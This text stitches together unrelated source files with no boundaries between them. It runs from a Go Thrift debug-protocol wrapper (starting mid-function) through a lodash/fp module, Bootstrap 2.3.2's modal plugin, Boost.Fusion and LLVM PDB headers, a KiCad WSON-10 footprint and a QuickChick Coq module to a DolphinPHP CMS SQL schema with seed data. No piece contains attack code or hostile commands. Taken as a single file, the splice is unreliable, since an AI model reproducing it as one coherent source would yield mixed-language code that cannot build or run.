value, err = tdp.Delegate.ReadI16()
log.Printf("%sReadI16() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadI32() (value int32, err error) {
value, err = tdp.Delegate.ReadI32()
log.Printf("%sReadI32() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadI64() (value int64, err error) {
value, err = tdp.Delegate.ReadI64()
log.Printf("%sReadI64() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadDouble() (value float64, err error) {
value, err = tdp.Delegate.ReadDouble()
log.Printf("%sReadDouble() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadString() (value string, err error) {
value, err = tdp.Delegate.ReadString()
log.Printf("%sReadString() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadBinary() (value []byte, err error) {
value, err = tdp.Delegate.ReadBinary()
log.Printf("%sReadBinary() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) Skip(fieldType TType) (err error) {
err = tdp.Delegate.Skip(fieldType)
log.Printf("%sSkip(fieldType=%#v) (err=%#v)", tdp.LogPrefix, fieldType, err)
return
}
func (tdp *TDebugProtocol) Flush() (err error) {
err = tdp.Delegate.Flush()
log.Printf("%sFlush() (err=%#v)", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) Transport() TTransport {
return tdp.Delegate.Transport()
}
var convert = require('./convert'),
func = convert('assignIn', require('../assignIn'));
func.placeholder = require('./placeholder');
module.exports = func;
/* =========================================================
* bootstrap-modal.js v2.3.2
* http://getbootstrap.com/2.3.2/javascript.html#modals
* =========================================================
* Copyright 2013 Twitter, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* ========================================================= */
!function ($) {
"use strict"; // jshint ;_;
/* MODAL CLASS DEFINITION
* ====================== */
var Modal = function (element, options) {
this.options = options
this.$element = $(element)
.delegate('[data-dismiss="modal"]', 'click.dismiss.modal', $.proxy(this.hide, this))
this.options.remote && this.$element.find('.modal-body').load(this.options.remote)
}
Modal.prototype = {
constructor: Modal
, toggle: function () {
return this[!this.isShown ? 'show' : 'hide']()
}
, show: function () {
var that = this
, e = $.Event('show')
this.$element.trigger(e)
if (this.isShown || e.isDefaultPrevented()) return
this.isShown = true
this.escape()
this.backdrop(function () {
var transition = $.support.transition && that.$element.hasClass('fade')
if (!that.$element.parent().length) {
that.$element.appendTo(document.body) //don't move modals dom position
}
that.$element.show()
if (transition) {
that.$element[0].offsetWidth // force reflow
}
that.$element
.addClass('in')
.attr('aria-hidden', false)
that.enforceFocus()
transition ?
that.$element.one($.support.transition.end, function () { that.$element.focus().trigger('shown') }) :
that.$element.focus().trigger('shown')
})
}
, hide: function (e) {
e && e.preventDefault()
var that = this
e = $.Event('hide')
this.$element.trigger(e)
if (!this.isShown || e.isDefaultPrevented()) return
this.isShown = false
this.escape()
$(document).off('focusin.modal')
this.$element
.removeClass('in')
.attr('aria-hidden', true)
$.support.transition && this.$element.hasClass('fade') ?
this.hideWithTransition() :
this.hideModal()
}
, enforceFocus: function () {
var that = this
$(document).on('focusin.modal', function (e) {
if (that.$element[0] !== e.target && !that.$element.has(e.target).length) {
that.$element.focus()
}
})
}
, escape: function () {
var that = this
if (this.isShown && this.options.keyboard) {
this.$element.on('keyup.dismiss.modal', function ( e ) {
e.which == 27 && that.hide()
})
} else if (!this.isShown) {
this.$element.off('keyup.dismiss.modal')
}
}
, hideWithTransition: function () {
var that = this
, timeout = setTimeout(function () {
that.$element.off($.support.transition.end)
that.hideModal()
}, 500)
this.$element.one($.support.transition.end, function () {
clearTimeout(timeout)
that.hideModal()
})
}
, hideModal: function () {
var that = this
this.$element.hide()
this.backdrop(function () {
that.removeBackdrop()
that.$element.trigger('hidden')
})
}
, removeBackdrop: function () {
this.$backdrop && this.$backdrop.remove()
this.$backdrop = null
}
, backdrop: function (callback) {
var that = this
, animate = this.$element.hasClass('fade') ? 'fade' : ''
if (this.isShown && this.options.backdrop) {
var doAnimate = $.support.transition && animate
this.$backdrop = $('<div class="modal-backdrop ' + animate + '" />')
.appendTo(document.body)
this.$backdrop.click(
this.options.backdrop == 'static' ?
$.proxy(this.$element[0].focus, this.$element[0])
: $.proxy(this.hide, this)
)
if (doAnimate) this.$backdrop[0].offsetWidth // force reflow
this.$backdrop.addClass('in')
if (!callback) return
doAnimate ?
this.$backdrop.one($.support.transition.end, callback) :
callback()
} else if (!this.isShown && this.$backdrop) {
this.$backdrop.removeClass('in')
$.support.transition && this.$element.hasClass('fade')?
this.$backdrop.one($.support.transition.end, callback) :
callback()
} else if (callback) {
callback()
}
}
}
/* MODAL PLUGIN DEFINITION
* ======================= */
var old = $.fn.modal
$.fn.modal = function (option) {
return this.each(function () {
var $this = $(this)
, data = $this.data('modal')
, options = $.extend({}, $.fn.modal.defaults, $this.data(), typeof option == 'object' && option)
if (!data) $this.data('modal', (data = new Modal(this, options)))
if (typeof option == 'string') data[option]()
else if (options.show) data.show()
})
}
$.fn.modal.defaults = {
backdrop: true
, keyboard: true
, show: true
}
$.fn.modal.Constructor = Modal
/* MODAL NO CONFLICT
* ================= */
$.fn.modal.noConflict = function () {
$.fn.modal = old
return this
}
/* MODAL DATA-API
* ============== */
$(document).on('click.modal.data-api', '[data-toggle="modal"]', function (e) {
var $this = $(this)
, href = $this.attr('href')
, $target = $($this.attr('data-target') || (href && href.replace(/.*(?=#[^\s]+$)/, ''))) //strip for ie7
, option = $target.data('modal') ? 'toggle' : $.extend({ remote:!/#/.test(href) && href }, $target.data(), $this.data())
e.preventDefault()
$target
.modal(option)
.one('hide', function () {
$this.focus()
})
})
}(window.jQuery);
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Copyright (c) 2005-2006 Dan Marsden
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
==============================================================================*/
#if !defined(BOOST_FUSION_CATEGORY_OF_IMPL_20060217_2141)
#define BOOST_FUSION_CATEGORY_OF_IMPL_20060217_2141
#include <boost/fusion/support/config.hpp>
#include <boost/fusion/support/detail/mpl_iterator_category.hpp>
#include <boost/mpl/begin_end.hpp>
#include <boost/mpl/is_sequence.hpp>
#include <boost/static_assert.hpp>
namespace boost { namespace fusion {
namespace detail
{
template <typename T>
struct mpl_sequence_category_of
{
// assumes T is an mpl sequence
// there should be no way this will ever be
// called where T is an mpl iterator
BOOST_STATIC_ASSERT(mpl::is_sequence<T>::value);
typedef typename
mpl_iterator_category<
typename mpl::begin<T>::type::category
>::type
type;
};
}
struct mpl_sequence_tag;
namespace extension
{
template<typename Tag>
struct category_of_impl;
template<>
struct category_of_impl<mpl_sequence_tag>
{
template<typename T>
struct apply
: detail::mpl_sequence_category_of<T>
{};
};
}
}}
#endif
//===- PDBStringTableBuilder.h - PDB String Table Builder -------*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
//
// This file creates the "/names" stream.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_DEBUGINFO_PDB_RAW_PDBSTRINGTABLEBUILDER_H
#define LLVM_DEBUGINFO_PDB_RAW_PDBSTRINGTABLEBUILDER_H
#include "llvm/ADT/DenseMap.h"
#include "llvm/ADT/StringRef.h"
#include "llvm/DebugInfo/CodeView/DebugStringTableSubsection.h"
#include "llvm/Support/Error.h"
#include <vector>
namespace llvm {
class BinaryStreamWriter;
class WritableBinaryStreamRef;
namespace msf {
struct MSFLayout;
}
namespace pdb {
class PDBFileBuilder;
class PDBStringTableBuilder;
struct StringTableHashTraits {
PDBStringTableBuilder *Table;
explicit StringTableHashTraits(PDBStringTableBuilder &Table);
uint32_t hashLookupKey(StringRef S) const;
StringRef storageKeyToLookupKey(uint32_t Offset) const;
uint32_t lookupKeyToStorageKey(StringRef S);
};
class PDBStringTableBuilder {
public:
// If string S does not exist in the string table, insert it.
// Returns the ID for S.
uint32_t insert(StringRef S);
uint32_t getIdForString(StringRef S) const;
StringRef getStringForId(uint32_t Id) const;
uint32_t calculateSerializedSize() const;
Error commit(BinaryStreamWriter &Writer) const;
void setStrings(const codeview::DebugStringTableSubsection &Strings);
private:
uint32_t calculateHashTableSize() const;
Error writeHeader(BinaryStreamWriter &Writer) const;
Error writeStrings(BinaryStreamWriter &Writer) const;
Error writeHashTable(BinaryStreamWriter &Writer) const;
Error writeEpilogue(BinaryStreamWriter &Writer) const;
codeview::DebugStringTableSubsection Strings;
};
} // end namespace pdb
} // end namespace llvm
#endif // LLVM_DEBUGINFO_PDB_RAW_PDBSTRINGTABLEBUILDER_H
(module WSON-10-1EP_2x3mm_P0.5mm_EP0.84x2.4mm (layer F.Cu) (tedit 5A65F1FE)
(descr "WSON-10 package 2x3mm body, pitch 0.5mm, see http://www.ti.com/lit/ds/symlink/tps62177.pdf")
(tags "WSON 0.5 ")
(attr smd)
(fp_text reference REF** (at 0 -2.55) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value WSON-10-1EP_2x3mm_P0.5mm_EP0.84x2.4mm (at 0 2.55) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text user %R (at 0 0) (layer F.Fab)
(effects (font (size 0.5 0.5) (thickness 0.075)))
)
(fp_line (start 0 -1.5) (end 1 -1.5) (layer F.Fab) (width 0.15))
(fp_line (start 1 -1.5) (end 1 1.5) (layer F.Fab) (width 0.15))
(fp_line (start 1 1.5) (end -1 1.5) (layer F.Fab) (width 0.15))
(fp_line (start -1 1.5) (end -1 -0.5) (layer F.Fab) (width 0.15))
(fp_line (start -1 -0.5) (end 0 -1.5) (layer F.Fab) (width 0.15))
(fp_line (start -1.55 -1.8) (end -1.55 1.8) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.55 -1.8) (end 1.55 1.8) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.55 -1.8) (end 1.55 -1.8) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.55 1.8) (end 1.55 1.8) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.575 1.625) (end 0.575 1.625) (layer F.SilkS) (width 0.15))
(fp_line (start -1.35 -1.625) (end 0.575 -1.625) (layer F.SilkS) (width 0.15))
(pad 1 smd rect (at -0.95 -1) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 2 smd rect (at -0.95 -0.5) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 3 smd rect (at -0.95 0) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 4 smd rect (at -0.95 0.5) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 5 smd rect (at -0.95 1) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 6 smd rect (at 0.95 1) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 7 smd rect (at 0.95 0.5) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 8 smd rect (at 0.95 0) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 9 smd rect (at 0.95 -0.5) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad 10 smd rect (at 0.95 -1) (size 0.5 0.25) (layers F.Cu F.Paste F.Mask))
(pad "" smd rect (at 0 0.8) (size 0.65 0.61) (layers F.Paste))
(pad 11 smd rect (at 0 0) (size 0.84 2.4) (layers F.Cu F.Mask))
(pad "" smd rect (at 0 0) (size 0.65 0.61) (layers F.Paste))
(pad "" smd rect (at 0 -0.8) (size 0.65 0.61) (layers F.Paste))
(model ${KISYS3DMOD}/Package_SON.3dshapes/WSON-10-1EP_2x3mm_P0.5mm_EP0.84x2.4mm.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
From QuickChick Require Import QuickChick.
Require Import ZArith.
Require Import List.
From QuickChick.ifcbasic Require Import Machine.
Fixpoint forallb2 {A : Type} (f : A -> A -> bool) (l1 l2 :list A) : bool :=
match l1, l2 with
| nil, nil => true
| cons h1 t1, cons h2 t2 => f h1 h2 && forallb2 f t1 t2
| _, _ => false
end.
(* Indistinguishability type class *)
Class Indist (A : Type) : Type :=
{
indist : A -> A -> bool
}.
Instance indist_atom : Indist Atom :=
{|
indist a1 a2 :=
let '(x1@l1) := a1 in
let '(x2@l2) := a2 in
match l1, l2 with
| L, L => Z.eqb x1 x2
| H, H => true
| _, _ => false
end
|}.
Instance indist_mem : Indist Mem :=
{|
indist m1 m2 := forallb2 indist m1 m2
|}.
Fixpoint cropTop (s:Stack) : Stack :=
match s with
| Mty => Mty
| x::s' => cropTop s'
| (x@H:::s') => cropTop s'
| (_@L:::_) => s
end.
(* Assumes stacks have been cropTopped! *)
Instance indist_stack : Indist Stack :=
{|
indist s1 s2 :=
let fix aux s1 s2 :=
match s1, s2 with
| a1::s1', a2::s2' => indist a1 a2 && aux s1' s2'
| a1:::s1', a2:::s2' => indist a1 a2 && aux s1' s2'
| Mty, Mty => true
| _, _ => false
end
in aux s1 s2
|}.
Instance indist_state : Indist State :=
{|
indist st1 st2 :=
let '(St imem1 mem1 stk1 pc1) := st1 in
let '(St imem2 mem2 stk2 pc2) := st2 in
if negb (indist mem1 mem2) then (* trace "Memory" *) false
else if negb (indist pc1 pc2) then (* trace "PC" *) false
else let (stk1',stk2') :=
match pc1 with
| _ @ H => (cropTop stk1, cropTop stk2)
| _ => (stk1, stk2)
end in
if negb (indist stk1' stk2') then (* trace "Stack" *) false
else true
|}.
-- -----------------------------
-- Export time: `2016-12-13 22:26:46`
-- -----------------------------
-- -----------------------------
-- Table structure for `dp_cms_advert`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_advert`;
CREATE TABLE `dp_cms_advert` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`typeid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '分类id',
`tagname` varchar(30) NOT NULL DEFAULT '' COMMENT '广告位标识',
`ad_type` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '广告类型',
`timeset` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '时间限制:0-永不过期,1-在设内时间内有效',
`start_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '开始时间',
`end_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '结束时间',
`name` varchar(60) NOT NULL DEFAULT '' COMMENT '广告位名称',
`content` text NOT NULL COMMENT '广告内容',
`expcontent` text NOT NULL COMMENT '过期显示内容',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='广告表';
-- -----------------------------
-- Table data for `dp_cms_advert`
-- -----------------------------
-- -----------------------------
-- Table structure for `dp_cms_advert_type`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_advert_type`;
CREATE TABLE `dp_cms_advert_type` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(32) NOT NULL DEFAULT '' COMMENT '分类名称',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='广告分类表';
-- -----------------------------
-- Table data for `dp_cms_advert_type`
-- -----------------------------
-- -----------------------------
-- Table structure for `dp_cms_column`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_column`;
CREATE TABLE `dp_cms_column` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`pid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '父级id',
`name` varchar(32) NOT NULL DEFAULT '' COMMENT '栏目名称',
`model` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '文档模型id',
`url` varchar(255) NOT NULL DEFAULT '' COMMENT '链接',
`target` varchar(16) NOT NULL DEFAULT '_self' COMMENT '链接打开方式',
`content` text NOT NULL COMMENT '内容',
`icon` varchar(64) NOT NULL DEFAULT '' COMMENT '字体图标',
`index_template` varchar(32) NOT NULL DEFAULT '' COMMENT '封面模板',
`list_template` varchar(32) NOT NULL DEFAULT '' COMMENT '列表页模板',
`detail_template` varchar(32) NOT NULL DEFAULT '' COMMENT '详情页模板',
`post_auth` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '投稿权限',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`sort` int(11) NOT NULL DEFAULT '100' COMMENT '排序',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
`hide` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '是否隐藏',
`rank_auth` int(11) NOT NULL DEFAULT '0' COMMENT '浏览权限,-1待审核,0为开放浏览,大于0则为对应的用户角色id',
`type` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '栏目属性:0-最终列表栏目,1-外部链接,2-频道封面',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='栏目表';
-- -----------------------------
-- Table data for `dp_cms_column`
-- -----------------------------
-- -----------------------------
-- Table structure for `dp_cms_document`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_document`;
CREATE TABLE `dp_cms_document` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`cid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '栏目id',
`model` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '文档模型ID',
`title` varchar(256) NOT NULL DEFAULT '' COMMENT '标题',
`shorttitle` varchar(32) NOT NULL DEFAULT '' COMMENT '简略标题',
`uid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '用户ID',
`flag` set('j','p','b','s','a','f','c','h') DEFAULT NULL COMMENT '自定义属性',
`view` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '阅读量',
`comment` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '评论数',
`good` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '点赞数',
`bad` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '踩数',
`mark` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '收藏数量',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`sort` int(11) NOT NULL DEFAULT '100' COMMENT '排序',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
`trash` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '回收站',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='文档基础表';
-- -----------------------------
-- Table data for `dp_cms_document`
-- -----------------------------
-- -----------------------------
-- Table structure for `dp_cms_field`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_field`;
CREATE TABLE `dp_cms_field` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '字段名称',
`name` varchar(32) NOT NULL,
`title` varchar(32) NOT NULL DEFAULT '' COMMENT '字段标题',
`type` varchar(32) NOT NULL DEFAULT '' COMMENT '字段类型',
`define` varchar(128) NOT NULL DEFAULT '' COMMENT '字段定义',
`value` text NULL COMMENT '默认值',
`options` text NULL COMMENT '额外选项',
`tips` varchar(256) NOT NULL DEFAULT '' COMMENT '提示说明',
`fixed` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '是否为固定字段',
`show` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '是否显示',
`model` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '所属文档模型id',
`ajax_url` varchar(256) NOT NULL DEFAULT '' COMMENT '联动下拉框ajax地址',
`next_items` varchar(256) NOT NULL DEFAULT '' COMMENT '联动下拉框的下级下拉框名,多个以逗号隔开',
`param` varchar(32) NOT NULL DEFAULT '' COMMENT '联动下拉框请求参数名',
`format` varchar(32) NOT NULL DEFAULT '' COMMENT '格式,用于格式文本',
`table` varchar(32) NOT NULL DEFAULT '' COMMENT '表名,只用于快速联动类型',
`level` tinyint(2) unsigned NOT NULL DEFAULT '2' COMMENT '联动级别,只用于快速联动类型',
`key` varchar(32) NOT NULL DEFAULT '' COMMENT '键字段,只用于快速联动类型',
`option` varchar(32) NOT NULL DEFAULT '' COMMENT '值字段,只用于快速联动类型',
`pid` varchar(32) NOT NULL DEFAULT '' COMMENT '父级id字段,只用于快速联动类型',
`ak` varchar(32) NOT NULL DEFAULT '' COMMENT '百度地图appkey',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`sort` int(11) NOT NULL DEFAULT '100' COMMENT '排序',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=utf8 COMMENT='文档字段表';
-- -----------------------------
-- Table data for `dp_cms_field`
-- -----------------------------
INSERT INTO `dp_cms_field` VALUES ('1', 'id', 'ID', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', 'ID', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480562978', '1480562978', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('2', 'cid', '栏目', 'select', 'int(11) UNSIGNED NOT NULL', '0', '', '请选择所属栏目', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480562978', '1480562978', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('3', 'uid', '用户ID', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563110', '1480563110', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('4', 'model', '模型ID', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563110', '1480563110', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('5', 'title', '标题', 'text', 'varchar(128) NOT NULL', '', '', '文档标题', '0', '1', '0', '', '', '', '', '', '0', '', '', '', '', '1480575844', '1480576134', '1', '1');
INSERT INTO `dp_cms_field` VALUES ('6', 'shorttitle', '简略标题', 'text', 'varchar(32) NOT NULL', '', '', '简略标题', '0', '1', '0', '', '', '', '', '', '0', '', '', '', '', '1480575844', '1480576134', '1', '1');
INSERT INTO `dp_cms_field` VALUES ('7', 'flag', '自定义属性', 'checkbox', 'set(\'j\',\'p\',\'b\',\'s\',\'a\',\'f\',\'h\',\'c\') NULL DEFAULT NULL', '', 'j:跳转\r\np:图片\r\nb:加粗\r\ns:滚动\r\na:特荐\r\nf:幻灯\r\nh:头条\r\nc:推荐', '自定义属性', '0', '1', '0', '', '', '', '', '', '0', '', '', '', '', '1480671258', '1480671258', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('8', 'view', '阅读量', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '1', '0', '', '', '', '', '', '0', '', '', '', '', '1480563149', '1480563149', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('9', 'comment', '评论数', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563189', '1480563189', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('10', 'good', '点赞数', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563279', '1480563279', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('11', 'bad', '踩数', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563330', '1480563330', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('12', 'mark', '收藏数量', 'text', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563372', '1480563372', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('13', 'create_time', '创建时间', 'datetime', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563406', '1480563406', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('14', 'update_time', '更新时间', 'datetime', 'int(11) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563432', '1480563432', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('15', 'sort', '排序', 'text', 'int(11) NOT NULL', '100', '', '', '0', '1', '0', '', '', '', '', '', '0', '', '', '', '', '1480563510', '1480563510', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('16', 'status', '状态', 'radio', 'tinyint(2) UNSIGNED NOT NULL', '1', '0:禁用\r\n1:启用', '', '0', '1', '0', '', '', '', '', '', '0', '', '', '', '', '1480563576', '1480563576', '100', '1');
INSERT INTO `dp_cms_field` VALUES ('17', 'trash', '回收站', 'text', 'tinyint(2) UNSIGNED NOT NULL', '0', '', '', '0', '0', '0', '', '', '', '', '', '0', '', '', '', '', '1480563576', '1480563576', '100', '1');
-- -----------------------------
-- Table structure for `dp_cms_link`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_link`;
CREATE TABLE `dp_cms_link` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`type` tinyint(2) unsigned NOT NULL DEFAULT '1' COMMENT '类型:1-文字链接,2-图片链接',
`title` varchar(128) NOT NULL DEFAULT '' COMMENT '链接标题',
`url` varchar(255) NOT NULL DEFAULT '' COMMENT '链接地址',
`logo` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '链接LOGO',
`contact` varchar(255) NOT NULL DEFAULT '' COMMENT '联系方式',
`sort` int(11) NOT NULL DEFAULT '100',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='有钱链接表';
-- -----------------------------
-- Table data for `dp_cms_link`
-- -----------------------------
-- -----------------------------
-- Table structure for `dp_cms_menu`
-- -----------------------------
DROP TABLE IF EXISTS `dp_cms_menu`;
CREATE TABLE `dp_cms_menu` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`nid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '导航id',
`pid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '父级id',
`column` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '栏目id',
`page` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '单页id',
`type` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '类型:0-栏目链接,1-单页链接,2-自定义链接',
`title` varchar(128) NOT NULL DEFAULT '' COMMENT '菜单标题',
`url` varchar(255) NOT NULL DEFAULT '' COMMENT '链接',
`css` varchar(64) NOT NULL DEFAULT '' COMMENT 'css类',
`rel` varchar(64) NOT NULL DEFAULT '' COMMENT '链接关系网',
`target` varchar(16) NOT NULL DEFAULT '' COMMENT '打开方式',
`create_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
`sort` int(11) NOT NULL DEFAULT '100' COMMENT '排序',
`status` tinyint(2) unsigned NOT NULL DEFAULT '0' COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='菜单表';
-- -----------------------------
-- Table data for `dp_cms_menu`
-- -----------------------------
INSERT INTO `dp_cms_menu` VALUES ('1', '1', '0', '0', '0', '2', '首页', 'cms/index/index', '', '', '_self', '1492345605', '1492345605', '100', '1');
INSERT INTO `dp_cms_menu` VALUES ('2', '2', '0', '0', '0', '2', '关于我们', 'http://www.dolphinphp.com', '', '', '_self', '1492346763', '1492346763', '100', '1');
INSERT INTO `dp_cms_menu` VALUES ('3', '3', '0', '0', '0', '2', '开发文档', 'http://www.kancloud.cn/ming5112/dolphinphp', '', '', '_self', '1492346812', '1492346812', '100', '1');
INSERT INTO `dp_cms_menu` VALUES ('4', '3', '0', '0', '0', '2', '开发者社区', 'http://bbs.dolphinphp.com/', '', '', '_self', '1492346832', '1492346832', '100', '1');
INSERT INTO `dp_cms_menu` VALUES ('5', '1', '0', '0', '0', '2', '二级菜单', 'http://www.dolphinphp.com', '', '', '_self', '1492347372', '1492347510', '100', '1');
